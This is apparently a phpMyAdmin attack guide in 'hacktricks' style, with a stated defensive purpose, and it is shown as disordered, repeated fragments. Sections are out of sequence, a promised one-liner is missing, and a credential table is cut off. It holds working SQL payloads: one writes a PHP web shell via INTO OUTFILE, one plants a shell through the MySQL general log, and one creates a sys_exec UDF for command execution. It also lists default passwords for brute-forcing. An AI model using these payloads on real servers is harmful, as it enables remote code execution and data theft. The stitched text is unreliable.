Last verified: June 2025 – phpMyAdmin 5.2.1, MySQL 8.0, Ubuntu 22.04.
CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so'; SELECT sys_exec('id'); Requires plugin directory write access. Most shared hosting disables this. Part 4: Privilege Escalation via phpMyAdmin Itself 4.1 Config File Disclosure The config.inc.php file contains database credentials and sometimes auth keys.
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php" Then access: http://target/shell.php?cmd=id phpmyadmin hacktricks verified
Use Hydra or a simple Python script. A one-liner:
| Username | Password | |----------|----------| | root | root | | root | (blank) | | root | toor | | admin | (blank) | | pma | pmapassword | Last verified: June 2025 – phpMyAdmin 5
SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/shell.php'; SELECT "<?php system($_GET['c']); ?>"; -- This gets written to log file Requires MySQL SUPER privilege (often given to root user in phpMyAdmin). 3.3 User-Defined Functions (UDF) for Persistent Shell Create a MySQL UDF that executes system commands.
Introduction phpMyAdmin is the most popular database management tool for MySQL/MariaDB. For penetration testers (and attackers), it is a high-value target because successful compromise often leads to remote code execution (RCE), data exfiltration, or privilege escalation. For defenders, understanding these "hacktricks" is the first step to proper hardening. Part 4: Privilege Escalation via phpMyAdmin Itself 4
Remember: The difference between a hacker and a security engineer is verification. Run these tests. Document the results. Then patch, block, and monitor. Bookmark this page or run the pma-hacktricks-verifier.sh script (available on GitHub) to automate checks for all methods described above.